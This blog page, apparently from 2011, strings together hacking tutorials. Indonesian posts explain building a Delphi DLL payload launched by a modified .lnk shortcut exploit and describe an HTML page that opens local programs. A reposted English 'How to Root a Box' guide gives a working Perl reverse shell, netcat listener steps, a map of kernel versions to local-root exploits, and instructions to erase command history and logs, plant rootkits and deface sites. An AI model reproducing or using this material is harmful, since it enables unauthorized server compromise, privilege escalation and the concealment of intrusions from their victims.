Saturday, 5 February 2011

Another ShortCut Exploit - ShortCut Exploit yang Lain - Uncensored - Yuk Membuat yang Sejenis!

Another ShortCut  Exploit - ShortCut  Exploit yang Lain
Uncensored (Virus Exploit, Rahasia Dibongkar)
Yuk Membuat yang Sejenis!






    Virus ShortCut  Exploit memang sedang menyebar nih. Ngetrend gitu deh bahasa gaulnya. Iya, bener deh semenjak pertamakali dipopulerkan oleh StuxNet, terknik ShortCut Exploit (.lnk atau .LNK) ini sungguh sangat menarik perhatian para Virus Maker (VM atau VX). Kenapa tidak, karena teknik ini membuat user ‘tercengang’ heran saat tiba-tiba virus aktif sendiri tanpa dieksekusi oleh user.

Oh iya, sebelumnya saya minta maaf menggunakan tinta merah untuk menulis tulisan ini, karena ini masih dalam rangka Gong Xi Fa Chai (3 Februari 2011). :D
Selamat tahun baru Imlek bagi yang merayakan! *bagi-bagi angpao ke saya dong!* :D

Oke, kita lanjut ke materi artikel ini!
Seiring perkembangan jaman, mungkin teknik virus dengan memanfaatkan autorun sudah boleh dibilang tidak asing lagi. Maka, tidak ada salahnya dong pembuat virus menggunakan teknik yang lebih baru demi mengikuti perkembangan jaman. :D


    Nah, pada kesempatan kali ini, perkenankan saya membongkar rahasia pembuatan (perancangan project) virus Exploit. Oh iya, saya menggunakan Delphi nih dalam eksperimen kali ini, udah pada bawa Delphi kan? :D

Untuk menciptakan Exploit ini, kita akan membuat project DLL (Dynamic Link Library) bukan project EXE ya, ingat nih!
Sudah pada tau kan bagaimana cara membuat file DLL di Delphi? Baiklah kalau masih ada yang belum tau, begini langkah-langkahnya:
    1. Jalankan Delphi
    2. Pilih menu File, New, Other













    3. Delphi Project, Dynamic-link Library (DLL atau dll)
    4. Ok


Maka akan tersedia layar untuk memasukkan script kita.
Script bawaan dari project dll ini sih awalnya seperti ini:
    Library Project1;
    Uses
        SysUtils,
        Classes;
    Begin
    End.

Hmm…, kalau diingat-ingat, penggunaan Uses diawal perintah mengingatkan saya pada salah satu pemrogrmman, apa yaaa…? Aha! Pascal! Iya, Pascal dikembangkan menjadi Delphi, biar gak ketinggalan jaman gitu, makanya menggunakan GUI (Graphical User Interface) sekalian. :D



    Oh iya, pada project kali ini, Uses yang digunakan yaitu SysUtils dan Windows, maka Uses untuk penggunaan Classes kita hapus saja.




Maka script yang kita isikan tinggal perintah untuk Procedure:
    Procedure perintah; stdCall;
    Begin
      WinExec('notepad.exe', SW_NORMAL);
    End;

    begin
    perintah;
    end.

Oh iya, perintah yang ditulis di atas yaitu perintah untuk menjalankan notepad jika file dll ini dieksekusi dengan dengan RunDll32.exe, tepatnya dengan perintah ‘perintah’ di dalamnya. *wah, ribet ya ngomongnya*. :D
Pokoknya kalau dipanggil menggunakan CMD maka seperti ini lah perintahnya:
RunDll32.exe C:\ProjectDLL.dll, perintah

Hmm…, error gak ya tu perintah? Soalnya sudah saya utak-atuk dikit sih. :D
Untuk C:\ pada penggunaan contoh perintah itu sifatnya variable (tidak mutlak), karena itu adalah path atau lokasi tempat dimana file dll disimpan untuk dijalankan.

Setelah selesai kita masukkan scriptnya, maka untuk contoh project ini, kita simpan saja pada Desktop, dan tadaaaaa…, Desktop Anda akan menjadi berantakan karena file dari project Delphi ini lumayan agak banyak. :D




    Nah, disimpan di Desktop tadi maksudnya agar file DLL hasil compile dari Delphi ini berada pada Desktop, biar lebih mudah dicari gitu.
Maka tinggal klik tombol Play (Run) deh, dan project siap dicompile menjadi self file, yaitu file dll.


Hah? Proses kompilasinya kok Error ya? Ah tapi gak apa, toh file dll-nya  udah jadi kan di Desktop.




    Oh iya, setelah eksperimen- eksperimen, saya akhirnya memutuskan untuk memodifikasi ulang code sebelumnya menjadi:
    Procedure perintah; stdCall;
    Begin

    End;

    Exports perintah;

    begin
      perintah;
        WinExec('notepad.exe', SW_NORMAL);
    end.

Ya, perintah yang baru ini saya buat lebih simple, lebih efisien terhadap pengeksekusian notepad. Soalnya kemarin saat saya dapat, tepatnya diajarin dari kakak Ridzky, perintah pengeksekusian notepad menjadi berganda, dan mengakibatnkan notepad terbuka dua kali.
Silakan Anda pelajari sendiri deh dimana letak perbaikan scriptnya sehingga bisa menjadi lebih efisien! :D


    Nah, untuk ShortCutnya, saya menggunakan ShortCut dari virus yang ada sebelumnya saja, hanya saya modif sedikit sehingga jadilah ShortCut Exploit Prototype by Ryan Bekabe. :D

Jadi begini ceritanya, ShortCut Exploit ini saya ambil dari salah satu sample (virus) file LNK yang ada, terus saya modif deh nilai Hex-nya agar nantinya membuka (menjalankan) file DLL yang saya buat dengan Delphi tadi. Untuk ekstensi, ShortCut Exploit ini ‘tidak mengenal ekstensi’, dia akan tetap bisa menjalankan file DLL dengan berbagai filename + ekstensinya. Tuh, eksperimen saya saja, saya menggunakan ekstensi .kau (dotKau) “tepatnya nama filenya aku.kau” dan .bkb (dotBkb) “tepatnya bkb.bkb” dalam penamaan file DLL, alhasil, file DLL tetap bisa jalan, adem ayem, mulus, lancar deh pokoknya! :D



Tak kenal maka tak sayang
Tak sayang maka tak cinta
Tak bisa jatuh cinta berarti tidak normal
(ahahahaaaa.... XD)

Maksudnya:



Dengan mengenal cara kerja suatu virus
Maka akan bisa kita cegah penyebaran virus itu
So, jangan takut sama virus ya!
;) :ting:










Kembangkan dan aplikasikanlah imajinasimu!
Janganlah kau biarkan layu!
I believe you can do it!











    Salam bebas virus
        Ryan Bekabe
              ToS
     Team of Smadav




Silakan download file ini dalam bentuk Wordnya di sini: http://www.ziddu.com/download/13685740/urtCutExploityangLain_UncensoredRahasiaDibongkar.doc.html

Wednesday, 2 February 2011

Hei, Ternyata Walaupun HTML Bersifat Client Side Scripting, Tetapi Bisa Menjalankan Program Yang Ada Di Drive (OS) Juga Lho!!!!


Selama ini sih memang HTML dikenal sebagai pemrograman yang bersifat Client Side Scripting, ya boleh dibilang tidak bisa merusak atau memiliki akses lebih terhadap sistem, tetapi setelah saya jalan-jalan dan ketemu situs http://d4rk-hack.blogspot.com/2010/02/one-klik-crash-html-iframe.html , weleh-weleh, ternyata HTML bisa segitunya juga. Fyuh....

Linknya menggunakan TinyUrl nih http://tinyurl.com/oytwd , tapi saking penasarannya demi mencari dimana web asli dari HTML Do tersebut maka saya bela-belain deh korbankan Karen (my comp) untuk sama-sama menelusurinya. Widddddiiiiiiih.... Bener-bener.... OUTLOOK.EXE yang berada di C:\Program Files\Microsoft Office\Office10 jadi jalan sendiri. Wew, sereeeeemmmm.... Karena sempat ke TinyURL tadi, maka saya pun akhirnya sempat menemukan halaman asli pembuatnya di http://ha.ckers.org/weird/popup.html
Haha, memang jago dah tu orang yang bikin, Hacker dah. :D

So, hati-hati ya kalau mau bereksperimen ke situs tersebut. ^^b


Salam bebas virus,

*Bagi yang mau download samplenya di sini: http://www.ziddu.com/download/13686644/Hati-hati_HTML_berbahaya_didalamnya.zip.html
Hati-hati lo ya

Ryan BeKaBe
ToS
(Team of SmadAV)

How to Root a Box?

#Trace: Linux 提权教程。
参考视频:

[1]http://rapidshare.com/files/109733291/Linux_Rooting.rar.html

[2]http://files.ge/file/401011/vidzeo-tar-gz.html


Today, I have decided to put up a tutorial for both newbies and pwners! and just reference for all of us. This is a dream of every h4k3r, to get free root access. if you haven't got one, then try harder, because you are not a h4ck3r then.

Hacking is not about dumping database using prescripted materials by another hacker, a good hacker does write his own script and use it to the maximum extent to achieve whatever his/her project was, and this is refers to as priv8 script.

You have to get access to restricted access before you can say, I'm a h4xor or so!
Today, I will give you brief tutorial on how to get your first root access!

Ok enough.

requirement:
shell http://unsecure-site.com/r57.php
http://unsecured-site.com/c99.php

This mean you have downloaded shell on the site.

You will need, swiss-army weapon (Don't travel to swiss yet, this is netcat) and it can be downloaded on internet free of charge

you will also need a backconnect script. I provided one for your use here!

so let's roll on.

Shell Access on a website is the first thing you will need.

You can get this access, by doing uploading of shell to any vulnerable website using the following method:
LFI = Local File Inclusion
RFI = Remote File Inclusion
SQL Injection

I will not go to details on the above. I will post extensive tutorial on those later, but I think the forum must have some nice tuto on those, do some search. :P

NOW, get swiss knife weapon, AKA netcat

http://www.vulnwatch.org/netcat/nc111nt.zip

If you have an antivirus that auto deletes infected files or virus i would suggest
disabling it as some av's will detect netcat as a hacktool or remote admin tool.
it is not a virus.

Downloaded? good on window box, double click it and it will bring up a command prompt, then type

-vv -l -n -p

Now backconnet
I preffer to use one thats not
in the shell because i find that those back connects work shitty so i will provide you
with one that i use. Very simple to use just save as "bc.pl" then upload to server and
end execute.

Code:
perl bc.pl
Code: PERL

#!/usr/bin/perl
use IO::Socket;
# Priv8 ** Priv8 ** Priv8
# s4t3ll1t3 SABOTAGE Connect Back Shell
# code by:s4t3ll1t3
# We Are :s4t3ll1t3-C0d3r-NT-\x90
# Email:s4t3ll1t3@ihsteam.com
#
#s4t3ll1t3@SlackwareLinux:/home/programing$ perl dc.pl
#--== ConnectBack Backdoor Shell vs 1.0 by s4t3ll1t3 of s4t3ll1t3 SABOTAGE ==--
#
#Usage: dc.pl [Host] [Port]
#
#Ex: dc.pl 127.0.0.1 2121
#s4t3ll1t3@SlackwareLinux:/home/programing$ perl dc.pl 127.0.0.1 2121
#--== ConnectBack Backdoor Shell vs 1.0 by s4t3ll1t3 of s4t3ll1t3 SABOTAGE ==--
#
#[*] Resolving HostName
#[*] Connecting... 127.0.0.1
#[*] Spawning Shell
#[*] Connected to remote host

#bash-2.05b# nc -vv -l -p 2121
#listening on [any] 2121 ...
#connect to [127.0.0.1] from localhost [127.0.0.1] 32769
#--== ConnectBack Backdoor vs 1.0 by s4t3ll1t3 of s4t3ll1t3 SABOTAGE ==--
#
#--==Systeminfo==--
#Linux SlackwareLinux 2.6.7 #1 SMP Thu Dec 23 00:05:39 IRT 2004 i686 unknown unknown
GNU/Linux
#
#--==Userinfo==--
#uid=1001(lamer) gid=100(users) groups=100(users)
#
#--==Directory==--
#/root
#
#--==Shell==--
#
$system = '/bin/bash';
$ARGC=@ARGV;
print "IHS BACK-CONNECT BACKDOOR\n\n";
if ($ARGC!=2) {
print "Usage: $0 [Host] [Port] \n\n";
die "Ex: $0 127.0.0.1 2121 \n";
}
use Socket;
use FileHandle;
socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname('tcp')) or die print "[-] Unable to
Resolve Host\n";
connect(SOCKET, sockaddr_in($ARGV[1], inet_aton($ARGV[0]))) or die print "[-] Unable to
Connect Host\n";
print "[*] Resolving HostName\n";
print "[*] Connecting... $ARGV[0] \n";
print "[*] Spawning Shell \n";
print "[*] Connected to remote host \n";
SOCKET->autoflush();
open(STDIN, ">&SOCKET");
open(STDOUT,">&SOCKET");
open(STDERR,">&SOCKET");
print "IHS BACK-CONNECT BACKDOOR \n\n";
system("unset HISTFILE; unset SAVEHIST;echo --==Systeminfo==--; uname -a;echo;
echo --==Userinfo==--; id;echo;echo --==Directory==--; pwd;echo; echo --==Shell==-- ");
system($system);
#EOF

copy the above to a file and name it bc.pl upload it to server, you are done.

**Note that if you are running a router or wireless on multiple ips set by your dhcp you
might have to forward the to what ever the ip of your computer is. You
can check this by opening command prompt and typing ipconfig you should get an ip that
looks similar to 192.168.1.100 which is the ip to forward to. If you are unsure about
how to forward your port check out this site and find your router model.

http://portforward.com/routers.htm

Now back to netcat, type the following command.

-vv -l -n -p 443

for this tutorial we will connect on port 4343. Hit enter and it
should start listening for a connection.

remember you had downloaded bc.pl. on the server, now conncet it to you netcat with the following command
perl bc.pl 443

Check your netcat, it should be connected
giving you details info about the box.

i like to do this first to know the kinda exploit u will use.
uname -a;id
Once executed you will see something probably similar to

Code:
Linux alexandra.adm24.de 2.6.8-2-686-smp #1 SMP Tue Aug 16 12:08:30 UTC 2005 i686
GNU/Linux
uid=33(www-data) gid=33(www-data) groups=33(www-data)

The important information here that you want is the OS & Kernel version which is 2.6.8-2 and you can see the last update of it was in 2005 so it's fairly old. which is a good thing for us.

below here are kernel that can be rooted, just general ideal. i have a link to the kernels and their exploit, check it out

http://www.molotovbitch.org/localroot/

Code:
2.2 -> ptrace
2.4.17 -> newlocal, kmod, uselib24
2.4.18 -> brk, brk2, newlocal, kmod
2.4.19 -> brk, brk2, newlocal, kmod
2.4.20 -> ptrace, kmod, ptrace-kmod, brk, brk2
2.4.21 -> brk, brk2, ptrace, ptrace-kmod
2.4.22 -> brk, brk2, ptrace, ptrace-kmod
2.4.22-10 -> loginx
2.4.23 -> mremap_pte
2.4.24 -> mremap_pte, uselib24
2.4.25-1 -> uselib24
2.4.27 -> uselib24
2.6.2 -> mremap_pte, krad, h00lyshit
2.6.5 -> krad, krad2, h00lyshit
2.6.6 -> krad, krad2, h00lyshit
2.6.7 -> krad, krad2, h00lyshit
2.6.8 -> krad, krad2, h00lyshit
2.6.8-5 -> krad2, h00lyshit
2.6.9 -> krad, krad2, h00lyshit
2.6.9-34 -> r00t, h00lyshit
2.6.10 -> krad, krad2, h00lyshit
2.6.13 -> raptor, raptor2, h0llyshit, prctl
2.6.14 -> raptor, raptor2, h0llyshit, prctl
2.6.15 -> raptor, raptor2, h0llyshit, prctl
2.6.16 -> raptor, raptor2, h0llyshit, prctl
2.6.23 - 2.6.24 -> diane_lane_******_hard.c
2.6.17 - 2.6.24-1 -> jessica_biel_naked_in_my_bed.c

you can get it there update version on this site.
http://www.molotovbitch.org/localroot/

Once you have found the Kernel ver. of the server you are about to root you need to find
the Local Root Exploit for that kernel which you can find with google using the list
above. or just go here to make it easier!

http://www.molotovbitch.org/localroot/

Now check which exploit goes for which kernel, ok? you found it. good, before doing anything on this server, be as smart as possible, type this command

unset HISTFILE ; unset HISTSIZE ; export HISTFILESIZE=0 ;
this simply try to help your ass to to be traced by the histroy of your commands

Now comply and root.

To Compile your scripts go to
your shell that you have spawned with netcat and follow this instructions.

Code:
gcc xpl.c -o xpl
This will compile your xpl.c to a file named xpl.

From here now all you have to do is run your exploit which can be done by simply typing
in your netcat connection

Code:
./xpl

It should execute the exploit file which you have just compiled and give you root

then type
id; whoami

it should say, root, your are root

Congratulations! then remember me in your dream for posting this for your use.

remember, all exploits are not just compile and execute, some requires some little works eg h0llyshit. it require a big file to work.

example of h00lyshit here

before the compile)
For the h00lyshit we must type:
gcc h00lyshit.c -o h00lyshit
then you get h00lyshit.
The command to run this exploit is:
./h00lyshit
We need a very big file on the disk in order to run successfully and to get root.
We must create a big file in /tmp or into another writable folder.
The command is:
dd if=/dev/urandom of=largefile count=2M
where largefile is the filename.
please wait 2-3 minutes to get the file created!
If this command fails we can try:
dd if=/dev/zero of=/tmp/largefile count=102400 bs=1024
Now we can procced to the last step. We can run the exploit by typing:
./h00lyshit largefile or
./h00lyshit /tmp/largefile
(If we are in a different writable folder and the largefile is created in /tmp)
If there are not running errors (maybe the kernel is patched or is something wrong with
exploit run or large file) we will get root
To check if we got root:
id or
whoami
If it says root we got root!
Now we can deface/mass deface all the sites of the server or to setup a rootkit (e.g.
SSHDoor) and to take ssh/telnet shell access to the server.
We must erase all logs in order to be safe with a log cleaner. A good cleaner for this
job is the MIG Log Cleaner. clean your tracks, never leave them uncleaned!


This tutorial is written by me, siteprojects
for more hands on training you can join me on my irc at irc.unixreal.net #siteprojects

I have provided some server for training.. so dont worry.

written by siteprojects and credit should be given to those who deserve it.

You have permission to post in another forum like always, but do not forget to give credit.
like I say, join irc.unixreal.net #siteprojects on details on how to get box rooted, LFI RFI SQL etc.

N jooooooooooooooy
Sumber: http://hi.baidu.com/tm3y/blog/item/d3d4700091de690d1c958355.html